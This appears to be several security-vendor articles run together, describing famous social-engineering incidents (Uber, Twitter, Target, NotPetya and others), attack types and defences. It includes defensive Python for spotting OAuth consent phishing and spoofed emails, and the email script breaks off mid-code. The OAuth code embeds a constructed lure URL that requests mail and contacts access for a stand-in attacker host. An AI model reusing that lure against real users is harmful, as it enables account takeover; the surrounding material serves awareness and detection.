A threat actor used Uber's internal Slack platform to impersonate an employee and gain internal network access. They posted an explicit image, and it's believed they escalated privileges and viewed sensitive information. The threat actor admitted the intrusion and said social engineering had been enough to get past Uber's security controls.

The threat actor, who goes by the name TeaPot, was only eighteen, but managed to fool an employee into providing login credentials. The lesson is that no application or platform should be dismissed as an access point. Organizations should protect internal platforms and applications with multi-factor authentication (MFA), preferably a phishing-resistant form such as FIDO2 security keys, since a push-based prompt can be approved by a worn-down user.

4. 2022 Attack on Rockstar Games

The social engineering attack on Rockstar Games, carried out by the same threat actor just a few days after the Uber incident, followed the same pattern. Once inside Rockstar's internal Slack, TeaPot claimed to have accessed code for the then-unannounced next Grand Theft Auto.

Given the circumstances, the lesson learned here is that threat actors may not stop once they breach the defenses of their original target. In fact, one successful social engineering attack may encourage the threat actor to try for another company using the same techniques that worked in the original attack.

5. 2022 Attack on Twilio

The threat actor gained access to private customer and employee account data after stealing employee credentials. This was done through a broad SMS phishing (smishing) campaign: Twilio employees received text messages posing as the company's IT department, warning that their passwords had expired or their schedules had changed, and linking to a fake sign-in page that captured whatever they typed. The lure domains used keywords such as "Twilio", "Okta" and "SSO" to look plausible.

The Twilio attack was broad in reach but targeted in content, since the messages named the company and its real login flow. The lesson is that email is not the only phishing channel: the same lure works over SMS, social media, chat platforms and phone calls, and phishing-resistant MFA is the control that makes a stolen password insufficient on its own.

Don’t Become a Victim of a Social Engineering Attack

These major companies fell prey to social engineering attacks despite thinking that their security standards were enough. The fact that three of the top social engineering attacks listed occurred in 2022 shows that threat actors are increasing their efforts. Use the lessons learned to strengthen your security defenses, with the right help.

Mitnick Security is here to demystify what it means to mitigate your risks— in just 5-½ easy steps. Our free guide breaks down a few of the most important improvements you can make, helping to dramatically improve your security posture.

Download the “ 5 ½ Easy Steps to Avoid Cyber Threats ” ebook to start your security hardening journey.

15 Examples of Social Engineering Attacks


Social engineering exploits the weakest link in any system: human error. It involves manipulating human psychology and behavior to deceive people into divulging sensitive information or granting unauthorized access to networks, systems, and physical locations.

Social engineering relies on exploiting powerful and near-universal emotions such as greed or fear instead of relying on technical hacking. It has become a preferred initial-access tactic for attackers, and its impact on cybersecurity is hard to overstate.

This article lists the 15 most famous cyber attacks where social engineering was the predominant factor. By understanding the hackers' tactics, you will be able to identify and thwart social engineering attacks on you and your organization.

Social Engineering Examples

Let's look at some of the most infamous  social engineering  cyber attacks in history.

1. Kevin Mitnick's Early Career

In 1994, Kevin Mitnick successfully posed as an employee and convinced Motorola, Novell, Nokia, and Sun Microsystems technical support staff that he urgently needed access to certain information for troubleshooting. Through a combination of charm, technical jargon, and urgency, he persuaded the support staff to provide him with the information he needed.

Armed with sensitive technical details, Mitnick gained unauthorized access to internal systems and exploited the vulnerabilities he had learned about. He was caught, but after his release from prison in 2000, Mitnick said he considered his actions "simple crimes of trespass." He further explained that his motivation was only to learn how phone networks operated.

Later in life, Kevin Mitnick, who  passed away in July 2023 , used his talents for ethical hacking , becoming a respected security consultant and author.

2. Spear Phishing Attack on the Democratic National Committee

During the 2016 U.S. presidential campaign, a cyber attack targeted high-ranking officials and employees within the Democratic National Committee (DNC), the governing body of the Democratic Party in the United States.

The attackers crafted personalized and convincing phishing emails, a technique called  spear phishing . Once a target clicked on malicious links or downloaded malware-infected attachments, they inadvertently provided their login credentials or allowed malware access to their system. The attackers gained unauthorized access to sensitive information within the DNC.

This breach eventually led to the release of confidential emails during the 2016 U.S. Presidential election campaign, which had significant political repercussions and triggered concerns about foreign interference. Investigations conducted by multiple cybersecurity firms blamed two notorious Russian hacking groups "Fancy Bear" and "Cozy Bear" for the breach.

The DNC contacted cybersecurity firm CrowdStrike for coordinated remediation and disaster recovery services. Concerningly,  their report  said that the two Russian state-sponsored hacking groups had infiltrated the DNC's network as early as 2015.

3. Bangladesh Bank Heist

The Bangladesh Bank heist was one of the most audacious and successful bank robberies in history, and not a single robber set foot in the bank.

The fraudulent transfers took place in February 2016, but the intrusion that made them possible began months earlier. Investigators later suspected insider assistance; the documented entry point, however, was spear phishing emails carrying malware-laden attachments. When the targets opened them, the attackers gained a foothold on the bank's network and systems.

Once inside, the attackers used internal processes and controls to manipulate the bank's SWIFT (Society for Worldwide Interbank Financial Telecommunication) system, a messaging network used by financial institutions to send and receive payments securely .

Using fraudulent SWIFT transactions, the hackers attempted to transfer nearly $1 billion from the Bangladesh Bank to their accounts in the Philippines. Although some of the transactions were blocked or reversed, the hackers were able to transfer approximately  $81 million .

Law enforcement agencies are still working to catch all the perpetrators of the Bangladesh Bank robbery.


Research by Deloitte suggests 91% of all cyber-attacks begin with a phishing email .

4. Sony Pictures Hack

In 2014, a group known as "Guardians of Peace" (GOP) targeted Sony Pictures Entertainment with spear phishing emails masquerading as official communications from trusted sources. GOP tricked Sony employees into disclosing their login credentials or clicking on malicious links that granted access to the company's systems.

Once inside, the hackers remained undetected for at least two months, during which they installed a listening implant, backdoor , proxy, destructive hard drive tool, and a cleaning tool to remove traces of the attack. Subsequently, they exfiltrated vast amounts of sensitive data, including unreleased movies, confidential business documents, employee records, and private email conversations.

One of the most significant aspects of the  data breach  was the theft of several films, including Annie and Fury , which were leaked online (Annie before it had reached theaters), causing substantial financial damage to the studio as copies spread across the internet.

The leaked emails were also particularly damaging, as they exposed unfiltered conversations between executives and other industry figures. Some of the emails contained candid opinions about celebrities, actors, and business partners.

While the identity of the individuals behind GOP remains uncertain, the United States government pointed to  North Korea as the likely culprit . The attack was allegedly motivated by the release of the film The Interview , a comedy centered around a fictional plot to assassinate North Korean leader Kim Jong-un.

5. Twitter Bitcoin Scam

In July 2020, hackers targeted several high-profile Twitter accounts, including those of Elon Musk, Barack Obama, Joe Biden, Kanye West, Bill Gates, and  many others .

The attackers began by scraping LinkedIn to identify Twitter employees with administrator privileges. Using paid tools available to job recruiters, they accessed these employees' private contact information, including cell phone numbers.

Having selected their targets, the attackers phoned them, impersonating Twitter's own IT staff. The pretext was tied to the company's remote work setup during the COVID-19 pandemic: employees were directed to a fake VPN login page, where the attackers captured credentials and one-time codes in real time and replayed them against the real service. Reportedly, the attackers also read pinned instructions in an internal Slack channel describing how to reach the company's account-management tools.

Once inside the account-support tools, the attackers took over the targeted accounts and posted tweets telling followers that any Bitcoin sent to a given address would be returned doubled.

The tweets were carefully crafted to appear authentic, capitalizing on the trust and authority of the targeted individuals. Many fell victim to the scam and sent their Bitcoin to the specified addresses, cumulatively losing hundreds of thousands of dollars.

6. NotPetya

Ransomware  is a program designed to extort money, and ranges from basic lock screens to intricate code with encryption and data exfiltration capabilities.

Emerging in 2016, Petya was a ransomware strain that broke with tradition: instead of encrypting individual files it overwrote the Master Boot Record and encrypted the file system's Master File Table, leaving the whole system unbootable. The original Petya reached victims through social engineering, typically an email posing as a job application whose linked "CV" was in fact an executable, alongside other lures and compromised websites.

On June 27, 2017, a major global attack used a new variant built on Petya's code, dubbed NotPetya. Kaspersky reported attacks on more than 80 companies, with 80% of all infections in Ukraine and Germany the second hardest-hit country at about 9%. The U.S. government estimates that the total damage exceeded  $10 billion . A caveat for this list: NotPetya's own initial vector was not social engineering but a software supply-chain compromise, a trojanized update of the Ukrainian accounting package M.E.Doc, after which it spread inside networks using the EternalBlue SMB exploit and credentials harvested from memory. Its ransom note was also a decoy, since the encryption could not be reversed, which is why it is better described as a wiper.

Experts concluded this was a politically motivated, state-sponsored attack against Ukraine: it hit Ukrainian government, banking (including the National Bank of Ukraine) and energy organizations, and it was launched on the eve of the Ukrainian Constitution Day holiday.


7. Target Data Breach

The Target data breach was one of the most significant in history: over 40 million payment card numbers were compromised, along with the names, addresses and phone numbers of some 70 million customers. In the aftermath, Target paid an  $18.5 million settlement  to the states that investigated the breach.

The attackers breached Target's network by compromising a third-party vendor, a refrigeration contractor called Fazio Mechanical. This type of attack is called a supply chain attack, and it focuses on exploiting the weakest link within a supply chain.

In 2022, the frequency of supply chain attacks exceeded that of malware-based attacks by 40% .

The Target hackers used phishing emails to install Citadel, a variant of the Zeus banking trojan, on Fazio's computers and harvest the vendor's credentials. Those credentials gave them access to Target's external vendor portal, which they used as a staging point to gain a foothold, escalate privileges and move laterally to Target's point-of-sale systems, where memory-scraping malware harvested card data as it was swiped.

At the time of the breach, all major versions of enterprise-grade anti-malware were capable of successfully detecting Citadel. However, Fazio most likely relied on a free anti-malware solution that lacked real-time protection .

8. Anthem Data Breach

The Anthem data breach of 2015 was one of the most expensive and impactful phishing attacks in history.

Targeting one of the largest health insurers in the United States, the Anthem breach is the most extensive healthcare data breach ever recorded, giving the attackers access to the personal and medical information of  nearly 79 million  people. The stolen data included names, dates of birth, Social Security numbers, medical IDs, and other sensitive information, which were likely sold on the  dark web .

The attack was extremely expensive for Anthem as well, costing the company about $230 million in remediation. The aftermath required Anthem to pay $115 million to settle consumer lawsuits, $39.5 million to resolve a multistate attorneys general investigation, and an additional $16 million to settle the  HIPAA audit  and subsequent  HIPAA violation fine .

A subsequent investigation led by government officials and the cybersecurity firm Mandiant claimed that the attack was state-sponsored but didn't name any perpetrators.  


Healthcare organizations are particularly vulnerable to cyber-attacks. phoenixNAP's Data Security Cloud is purpose-built to meet the stringent requirements of the healthcare sector. With strong encryption, rigorous access controls, and comprehensive data backup and recovery solutions, we ensure unparalleled security for protected health information.

9. Evaldas Rimasauskas Wire Fraud

From 2013 to 2015, a Lithuanian called Evaldas Rimasauskas stole $99 million from Facebook and $23 million from Google by creating fake invoices. With meticulously crafted emails, he deceived the companies' employees into paying for goods they did not order or receive.

Using a technique similar to "typo squatting" or " URL hijacking ," Evaldas created a company in Latvia with a name closely resembling Quanta Computer Inc., a reputable Taiwanese electronics manufacturer. Under this guise, he conducted fraudulent multimillion-dollar transactions with Google and Facebook, forwarding the funds to his bank accounts in Latvia and Cyprus.

To cover his tracks, he fabricated invoices, contracts, and letters bearing forged signatures of Google and Facebook executives and agents. Surprisingly, neither company scrutinized the legitimacy of these documents.

His fraudulent activities ended when Lithuanian authorities apprehended him in 2017 and he was subsequently extradited to the United States. Rimasauskas pleaded  guilty  to one count of wire fraud and was sentenced to 60 months in prison.

10. AI Deepfake Scam Hits UK Energy Firm

In 2019, criminals used AI voice-cloning software to steal €220,000 from a UK energy firm in a textbook  whaling attack : CEO fraud aimed at a senior executive, carried out here by phone (vishing) rather than by email.

The scammers successfully impersonated the German CEO of the UK energy firm's parent company. The scammers persuaded the UK CEO to urgently send money to a Hungarian supplier, which was, in fact, their account.

Shortly after the UK CEO sent the €220,000, the hackers called again, claiming they had sent money to reimburse him for the urgent transaction. Later that day, they made a third call, once more impersonating the CEO and requesting a second payment.

The UK CEO grew suspicious as the reimbursement had not arrived, and the third call came from an Austrian phone number. Consequently, he decided not to proceed with the second payment.

Following the transfer to the Hungarian bank account, the funds were moved to Mexico and distributed to other locations.

During the investigation, it was concluded that the perpetrators had employed commercial software to impersonate the German executive's voice. This is one of the first known occurrences of AI voice mimicry being used for fraud.

To date, investigators have not identified any suspects and have had to end the investigation.


The widespread digitalization of most aspects of society defines our era. As cybercrime continues to rise, the importance of cybersecurity will only increase. To stay ahead of the curve, read our article on how to prevent social engineering attacks , featuring seventeen security experts.

11. Google Drive Scam

In May 2017, a phishing worm spread through Gmail by riding on Google's own document-sharing notifications. Victims received an email, apparently from a contact, saying a document had been shared with them, with an "Open in Docs" button. The link led to a genuine accounts.google.com consent page, where a third-party application that the attacker had registered under the name "Google Docs" asked for permission to read, send and delete the victim's mail and to manage their contacts. Nothing on the consent screen distinguished the app from Google's own product except the developer details behind the name.

Clicking Allow issued the attacker an OAuth token for the victim's mailbox and contacts. No password was captured and no second factor was prompted, because the victim had already authenticated with Google and merely delegated access. The app immediately sent the same lure to everyone in the victim's contact list, which is what made it a worm.

Phishing is nothing new, but the alarming aspect of this campaign was that there was no lookalike domain to spot: the notification came from Google, the consent page was hosted by Google, and the app called itself Google Docs. Users had none of the familiar cues that something was wrong.

Google disabled the offending application and revoked its tokens within about an hour of the first reports, and later introduced stricter verification for third-party apps that request sensitive Gmail and Drive scopes.
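The defensive point of the Google Docs worm is that an OAuth consent screen shows an attacker-chosen display name, so the only reliable identity is the client_id, and the thing to judge is the set of scopes requested. The following Python is an added example for this article, not Google's code or the original author's; it parses the kind of authorization URL that sat behind the "Open in Docs" button and scores consent grants so that an administrator can revoke the dangerous ones. The client IDs, app names, allow-list and grant records are constructed; the scope URIs are Google's published scope names.

```python
"""Spot OAuth consent-phishing indicators in authorization requests and grants.

Added example for this article; it is not Google's code or the article's own.
The client IDs, app names and grant records are constructed; the scope URIs
are Google's published OAuth scope names.
"""
from urllib.parse import parse_qs, urlparse

# Scopes that hand an app the same reach the 2017 worm had: read and send
# mail, enumerate contacts, or touch every Drive file.
SENSITIVE_SCOPES = {
    "https://mail.google.com/": "full Gmail access",
    "https://www.googleapis.com/auth/gmail.modify": "read/modify Gmail",
    "https://www.googleapis.com/auth/gmail.send": "send mail as the user",
    "https://www.googleapis.com/auth/gmail.readonly": "read Gmail",
    "https://www.googleapis.com/auth/contacts": "read/write contacts",
    "https://www.googleapis.com/auth/contacts.readonly": "read contacts",
    "https://www.googleapis.com/auth/drive": "full Drive access",
}

# Hypothetical allow-list: client_ids an organisation has reviewed and approved.
TRUSTED_CLIENT_IDS = {
    "123456789012-trusted.apps.googleusercontent.com",
}

# Display names a third-party app has no business using.
FIRST_PARTY_NAMES = {"google docs", "google drive", "google sheets",
                     "gmail", "google", "google workspace"}


def parse_authorization_url(url):
    """Pull client_id, redirect_uri and the requested scopes out of an OAuth
    authorization URL of the kind a consent-phishing link carries."""
    query = parse_qs(urlparse(url).query)

    def first(key):
        return query.get(key, [""])[0]

    return {
        "client_id": first("client_id"),
        "redirect_uri": first("redirect_uri"),
        "scopes": set(first("scope").split()),
    }


def assess_grant(app_name, client_id, scopes):
    """Classify a consent request or existing grant. The display name is
    attacker-chosen, so identity keys on client_id and risk keys on scopes."""
    findings = []
    sensitive = sorted(s for s in scopes if s in SENSITIVE_SCOPES)
    trusted = client_id in TRUSTED_CLIENT_IDS
    if sensitive:
        findings.append("requests sensitive scopes: "
                        + ", ".join(SENSITIVE_SCOPES[s] for s in sensitive))
    if not trusted:
        findings.append(f"client_id {client_id!r} is not on the allow-list")
    if app_name.strip().casefold() in FIRST_PARTY_NAMES and not trusted:
        findings.append(f"display name {app_name!r} imitates a first-party product")
    if sensitive and not trusted:
        risk = "high"
    elif sensitive or not trusted:
        risk = "medium"
    else:
        risk = "low"
    return {"app_name": app_name, "client_id": client_id,
            "risk": risk, "findings": findings}


def review_grants(grants):
    """grants: iterable of (app_name, client_id, scopes) as exported from an
    admin console. Returns the assessments worth revoking or investigating,
    highest risk first."""
    order = {"high": 0, "medium": 1, "low": 2}
    assessed = [assess_grant(*grant) for grant in grants]
    return sorted((a for a in assessed if a["risk"] != "low"),
                  key=lambda a: order[a["risk"]])


# Constructed lure, shaped like the link behind the worm's "Open in Docs"
# button. The client_id is made up; the scopes are the ones that matter.
LURE_URL = (
    "https://accounts.google.com/o/oauth2/auth"
    "?client_id=000000000000-fake.apps.googleusercontent.com"
    "&scope=https://mail.google.com/%20https://www.googleapis.com/auth/contacts"
    "&redirect_uri=https://googledocs.docscloud.example/g.php&response_type=code"
)

if __name__ == "__main__":
    request = parse_authorization_url(LURE_URL)
    print(assess_grant("Google Docs", request["client_id"], request["scopes"]))
```

Run against an export of existing grants, this surfaces the combination that made the worm effective: a first-party-sounding name on an unknown client_id asking for mail and contacts. Users cannot be expected to make that judgement on a consent screen; restricting which third-party apps may request sensitive scopes is an administrator's job.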

12. Reveton

In 2012, the Reveton ransomware strain gained notoriety as  the first Ransomware-as-a-Service (RaaS) operation . It gave gangs with limited technical expertise the ransomware tooling and infrastructure to run attacks without developing the malware themselves. Today, almost anyone can mount an effective ransomware campaign thanks to RaaS.

Another notable aspect of Reveton is its aggressive and intimidating approach. Nicknamed a "Police Trojan," it locked the victim's screen, displaying a fake message from law enforcement agencies, falsely accusing them of illegal activities such as copyright infringement or having a connection to child pornography.

To unlock the computer, the hackers demanded payment of a "fine," exploiting official logos and language to instill urgency and fear in the victim. In this aspect, Reveton serves as a prime example of hackers skillfully using social engineering to establish credibility.

Moreover, the ransomware utilized the user's computer IP address and webcam imagery to create the illusion of constant monitoring and recording, manipulating the victim into succumbing to the ransom demand.


13. The Lapsus$ Hacking Group

In late 2022, the UK police arrested two teenagers, Arion Kurtaj (18) and an unnamed 17-year-old, for their involvement in hacking various organizations. The long list of companies includes Nvidia, Rockstar Games, Revolut, BT Group, Uber, and even the  cloud storage servers of the London Police .

The prosecutor assigned to the case emphasized that the hackers were not merely indulging in "juvenile pranks" but in sophisticated crime with the aim to profit.

The young hacker's resume includes the following:

  • Stealing sensitive code and videos of Rockstar's latest Grand Theft Auto game and leaking the information while demanding a ransom. Kurtaj allegedly used social engineering to pose as a contractor within the company and breach the firewall.
  • The pair accessed software building blocks for Nvidia's products, publicly releasing some of the stolen data and threatening to release the rest if they didn't receive a ransom.
  • The teenagers also allegedly hacked BT and engaged in SIM swap fraud, draining the cryptocurrency and bank accounts of multiple customers.

While astonishingly competent for their age, the pair had a penchant for bragging that led to their downfall. After they boasted about their exploits online, the police quickly  identified and arrested the hackers , who were still awaiting final sentencing at the time of writing.

14. Barbara Corcoran Phishing Incident

In 2020, Barbara Corcoran, the host of the reality television series Shark Tank, was nearly scammed out of  $400,000 .

The scam was a phishing attack in which the scammer successfully deceived Corcoran's bookkeeper with an email that looked like it was from her assistant. The email asked the bookkeeper to wire money to a fictitious contractor working on a European renovation project.

As Corcoran herself remarked, "The story was totally plausible because I invest in a lot of real estate and do a lot of renovations for a living."

In a stroke of luck, the German-based bank the bookkeeper used to transfer the money froze the transaction before it reached the scammer's account in China. Corcoran explained that her bank in New York requested the German bank to suspend the transfer, allowing her to provide evidence of fraud.

15. Cabarrus County Hack

In 2018, hackers successfully persuaded Cabarrus County, NC officials to give them more than $2.5 million.

Posing as representatives from a construction contractor, the scammers contacted officials, pretending to be involved in the construction of a local high school, which was genuinely being built. They skillfully convinced the officials to change the bank account to which they made payments for the construction of the school. To strengthen their deception, they provided what appeared to be legitimate documentation and approvals.

Once the criminals received the deposit, the funds were rerouted through various other accounts. Several weeks later, the scheme came to light when the genuine vendor contacted the officials, inquiring about a missed payment.

The authorities eventually recovered a portion of the funds, reducing the loss to  $1.7 million .

Social engineering protection

The baseline defense is unique, strong passwords backed by phishing-resistant multi-factor authentication, together with  email security best practices : enforced SPF, DKIM and DMARC on your own domains, banners on external mail, and a hard rule that any change to a supplier's bank details is confirmed by calling a number already on file, never one supplied in the request. Those procedures alone would have stopped or blunted many of the attacks listed above.

As attackers have grown more sophisticated, so has the technology used to thwart them.  Intrusion detection systems  and  firewalls , increasingly with machine-learning assistance, analyze large volumes of traffic and logs to surface anomalies and breaches in close to real time.

Formidable as these technologies are, they cannot by themselves shield an organization from a determined adversary who targets its people. By prioritizing  cybersecurity training  for employees, organizations build the human layer of defense that the examples above show is so often the one that fails.


February 27, 2024

What Is Social Engineering? Examples & How To Prevent It


Social engineering is the form of attack that targets the least predictable component of any security system: the people who operate it. Rather than exploiting a software vulnerability, the attacker manipulates someone into breaking a security procedure, revealing confidential information or granting access they should not. This article sets out what social engineering is, why it works, the forms it takes, and the awareness and proactive measures that reduce its risk.

What Is Social Engineering?

Social engineering is a cyber threat that leverages human psychology rather than technical vulnerabilities. It uses deception to get individuals to bypass normal security procedures, leading to unauthorized access, data theft or financial fraud. What sets it apart from hacking or malware is its reliance on human interaction and the exploitation of trust, emotions and cognitive biases, which is why technical controls alone never fully address it.

Why Is Social Engineering Dangerous?

The danger of social engineering lies in its ability to bypass otherwise sound technical controls by going through the people who hold the keys. Successful attacks lead to data breaches, financial losses and reputational damage for individuals and organizations alike. Because they exploit ordinary helpfulness, curiosity and deference to authority, everyone with access is a potential target, which is why vigilance and education are as important as any technical measure.

Types of Social Engineering Attacks

Social engineering attacks come in various forms, each with unique methodologies and objectives. Some of the most common types include:

  • Phishing : Attacks that are designed to spoof emails or messages to elicit sensitive information, a direct application of social engineering principles in cyber security to exploit trust. Incorporating phishing simulation exercises and phishing awareness training into organizational security protocols can significantly enhance the ability to recognize and respond to these tactics.
  • Baiting : Offering something enticing to compromise security protocols, leveraging human curiosity.
  • Pretexting : Fabricating scenarios to divulge privileged information, an intricate use of social engineering in cyber security to create believable stories that lower defenses.
  • Tailgating : Following authorized personnel into restricted areas, exploiting the social norm of holding doors open for others.
  • Quid pro quo : Offering a benefit in exchange for information or access, capitalizing on human reciprocity tendencies.
  • Scareware : Frightening users into downloading malicious software, manipulating fear and urgency.
  • Watering hole attacks : Compromising commonly used websites to target a specific group, a strategic application of social engineering principles to exploit trust in familiar online spaces.
  • Business email compromise : Impersonating high-level executives to authorize fraudulent transactions, exploiting authority and trust within organizations.
  • Physical social engineering : Directly interacting with individuals to manipulate them into compromising security, using social engineering principles to exploit human willingness to assist.

These attacks exploit various aspects of human nature, from trust to curiosity, emphasizing the need for comprehensive security awareness training against social engineering.

Real-World Examples of Social Engineering

Real-world incidents show the range of strategies attackers use, the damage they cause, and why comprehensive defenses and heightened awareness are needed. The following cases are notable examples:

  • The Twitter Bitcoin Scam (2020) : In a bold display of social engineering, hackers compromised high-profile Twitter accounts, including those of celebrities and politicians, to promote a Bitcoin scam. By gaining the trust of followers, the attackers solicited Bitcoin transfers with the promise of doubling any amount sent. This attack spotlighted the effectiveness of social engineering in manipulating trust and the importance of securing social media accounts against unauthorized access.
  • The Sony Pictures Hack (2014) : In an instance of social engineering combined with sophisticated hacking techniques, attackers breached Sony Pictures’ network, leading to the leak of confidential data, personal emails, and unreleased films. The incident serves as a cautionary tale about the potential for social engineering attacks to exploit human vulnerabilities, underscoring the need for a multi-layered security strategy that includes educating employees on social engineering tactics.
  • The Target Data Breach (2013) : Attackers gained access to Target’s network through a phishing email sent to a third-party vendor, leveraging this entry point to compromise the retailer's payment system and exposing the personal and financial information of millions of customers. This breach emphasizes the necessity of phishing awareness training and the vigilance required in monitoring third-party access to protect sensitive information.

These examples demonstrate the varied and sophisticated nature of social engineering attacks, exploiting both human psychology and technological vulnerabilities. They serve as compelling arguments for the implementation of rigorous security measures, including regular security awareness training and phishing simulation exercises, to protect against future attacks. The key takeaway from these incidents is the imperative need for ongoing vigilance, education, and adaptation in the face of evolving social engineering tactics.

What Makes You Vulnerable to Social Engineering?

Common psychological factors such as trust, fear, curiosity, and complacency significantly contribute to an individual's susceptibility to social engineering. The lack of awareness or insufficient training on the latest cybersecurity threats further increases vulnerability to social engineering, highlighting the need for continuous education and proactive security practices. It's the exploitation of these psychological factors that social engineering in cyber security so effectively leverages.

Typical Targets of Social Engineering Attacks

Attackers often target groups or individuals with access to sensitive information or resources, including employees in key industries, high-level executives, and even the general public. Understanding the criteria attackers use to choose their targets helps in developing targeted defenses against social engineering. Target selection usually follows the same principle as the attacks themselves: go after whoever is most likely to yield access or information with the least resistance.

How To Recognise a Social Engineering Attack

The ability to recognize a social engineering attack hinges on sharpened situational awareness and honed critical thinking skills. In the nuanced world of cybersecurity threats, social engineering maneuvers through the gray areas of human interaction, making its detection both critical and challenging. To arm oneself against these covert operations, it's essential to be aware of the signs that signal a social engineering attempt. Here are practical tips and indicators that can help identify these deceptive strategies:

  • Unexpected Requests for Information : Be wary of unsolicited requests for sensitive information, especially if the requestor pressures for immediate disclosure. Authentic organizations typically follow known protocols that do not involve urgent demands for personal or financial details.
  • Mismatched Email Addresses and Links : Scrutinize the sender's email address, the Reply-To address, and any links contained in the message. A common phishing tactic involves spoofing or imitating email addresses so they appear legitimate, but upon closer inspection discrepancies become apparent. Hover over links to preview the URL before clicking, and read the registered domain (the part just before the top-level domain) rather than a familiar brand name that may appear earlier in the host name or in the path; lookalike domains and link shorteners are designed to defeat a quick glance.
  • Typos and Grammatical Errors : Professional communications are generally free of significant errors. Messages riddled with typos and grammatical mistakes should raise red flags, as they may indicate a phishing attempt or other forms of social engineering.
  • Sense of Urgency or Threats : Social engineering attacks often create a false sense of urgency or convey threats to compel the victim to act hastily, bypassing their better judgment. Question the legitimacy of any communication that pushes for quick action under the threat of consequences.
  • Requests for Verification of Personal Details : Be cautious of communications asking you to confirm or divulge personal details or passwords. Legitimate entities already have this information and would not request it in such a manner.
  • Unusual Sender Behavior : If an email or message from a known contact seems out of character or asks for unusual actions, it could be a sign of a compromised account being used for a social engineering attack. Verify the request through a separate communication channel.
  • Offers That Seem Too Good To Be True : Social engineering often uses baiting tactics by promising rewards or incentives that seem too generous or come out of nowhere. Approach such offers with skepticism and verify their authenticity.

Enhancing your ability to detect these attempts is an ongoing process. Engaging in regular security tests can significantly improve awareness and preparedness, making it easier to spot and sidestep social engineering attacks. Moreover, phishing awareness training plays a crucial role in educating individuals on the evolving nature of these threats, empowering them with the knowledge and tools to defend against social engineering. Remember, in the realm of cybersecurity, skepticism and verification are your strongest allies.

How To Prevent Social Engineering Attacks

Preventing social engineering attacks involves a combination of training, policy development, and technological solutions. By fostering a culture of security awareness and adopting a proactive stance towards cybersecurity, individuals and organizations can significantly reduce their risk of being victimized by these deceptive social engineering tactics. The goal is to protect the information and maintain robust security measures.

Evolving Trends in Social Engineering

As we navigate through an increasingly digital world, the sophistication of social engineering attacks continues to grow, leveraging emerging technologies and exploiting human behaviors in novel ways.

Deepfake technology, which uses artificial intelligence to create realistic audio and video impersonations, presents a significant threat. Attackers can now create convincing messages from seemingly trustworthy sources, making it harder to distinguish genuine communications from social engineering attacks. This advancement could lead to an increase in business email compromise attacks, where attackers spoof high-level executives to authorize fraudulent transactions or divulge sensitive information.

Another growing concern is the exploitation of social media platforms. Social engineering attackers are increasingly using these platforms to gather personal information about their targets, tailoring their attacks with a precision that makes them more effective than ever. This method not only undermines the trust in social interactions online but also highlights the need for enhanced phishing awareness training that addresses the nuances of social media spoofing.

Predicting future challenges, the integration of artificial intelligence (AI) and machine learning (ML) into social engineering attacks could lead to more automated and adaptive phishing campaigns. These campaigns could dynamically adjust their approaches based on the effectiveness of previous attacks, making them more difficult to detect and prevent.

To stay one step ahead of these evolving threats, organizations and individuals must prioritize continuous learning and adaptation in their cybersecurity strategies. Emphasizing the importance of phishing simulation exercises and security awareness training will be key in equipping people with the skills to recognize and respond to social engineering attacks. Moreover, fostering a culture of security that evolves with the technological landscape and social engineering tactics will be crucial in mitigating the risks associated with these ever-changing threats.

Stay One Step Ahead With Living Security

By staying informed about the latest tactics used by attackers and incorporating Living Security's innovative solutions into your cybersecurity strategy, you can protect your data and maintain a strong defense against these manipulative social engineering attacks. Let us empower you with the knowledge and tools to safeguard your information in this digital age, utilizing tools like phishing simulation and security awareness training to enhance your organizational security posture.


The 13 Most Common Types of Social Engineering Attacks + How to Defend Against Them


  • July 04, 2023

Emily Bonnie

Senior Content Marketing Manager at Secureframe

Anna Fitzgerald

The average organization is targeted by 700+ social engineering attacks each year, nearly three attacks every business day. And with 98% of all successful cyberattacks involving some form of social engineering , it’s essential for organizations to understand the most pervasive attack methods.

What is social engineering exactly, and why does it pose such a significant threat to organizations today? In this article, we’ll discuss 13 common types of social engineering attacks, explain how they work, provide real-life examples, and share best practices for preventing them.

1. Phishing

Phishing is one of the most common social engineering techniques. With phishing scams, attackers send emails that appear to be from reputable sources to trick individuals into revealing sensitive information like passwords and credit card numbers.

These emails often inspire a sense of urgency, prompting the victim to click on a malicious link. This link leads them to a fake website where they are asked to enter personal data such as login credentials, account information, social security numbers, or other confidential information.


In 2013, Target Corporation fell victim to a phishing attack where attackers initially gained access to their network through a phishing email sent to an HVAC company that had connections with Target. This led to a data breach that compromised the credit card information of over 40 million customers.

Target isn’t the only organization to suffer a cyberattack in this way: a 2022 study conducted by Ponemon Institute revealed 54% of organizations experienced a data breach caused by one of their third-party vendors in the previous 12 months.


2. Clone phishing

Clone phishing is a special type of phishing attack where a legitimate email is used to create an almost identical or "cloned" email but with some critical changes.

Here is how clone phishing campaigns typically work:

  • Email selection : The attacker selects a legitimate email that was sent to the intended victim. This email could be anything from a routine company announcement to an invoice or an account notification.
  • Creating the clone : The attacker makes a copy or "clone" of the email, reproducing it as closely as possible to the original.
  • Altering the content : The attacker alters some elements of the cloned email. This usually involves changing the links or attachments within the email to malicious ones. For example, where the original email might have contained a link to an online invoice, the clone could contain a link to a malicious website designed to harvest login credentials.
  • Resending the email : The attacker sends the cloned email to the original recipients but makes it appear as if it's coming from the same sender as the original email. This might be accompanied by a pretext such as an updated link, a corrected version of the attachment, or any excuse that seems plausible.
  • Victim's response : If recipients of the cloned email believe it's a legitimate follow-up to the previous email, they might click on the link or download the attachment without suspicion. This can lead to the compromise of sensitive data or malware infection.

Clone phishing is particularly effective because it uses the trust established by the original, legitimate email to bypass the victim's defenses. It's always important to verify the authenticity of email communications, especially those containing links or attachments, even if they appear to come from a known source. It’s advisable to contact the person or company directly to confirm the legitimacy of the email, especially if the email seems unexpected or slightly different from the usual communication style.
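The checks described above for clone phishing, together with the "Mismatched Email Addresses and Links" indicator earlier on this page, can be automated at the mail gateway or in a triage script. The following is an added example written for this page, not code from either article: it parses a message, flags a Reply-To domain that differs from the From domain, sender or link domains that imitate a trusted domain through common character substitutions, link text that names a different host than the href, and, when the earlier legitimate message is supplied, links whose hosts changed even though the subject is identical. The trusted domains, the two messages, and the confusable-character table are all constructed for the example.

```python
"""Added example: flag a spoofed or cloned email by its Reply-To/From mismatch,
lookalike domains, link text that disagrees with its href, and (given the earlier
legitimate message) links that now point somewhere new. All data is constructed."""
import email
import re
from email import policy
from urllib.parse import urlparse

TRUSTED_DOMAINS = {"example-bank.com", "example.com"}   # hypothetical trusted senders
CONFUSABLES = [("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s")]
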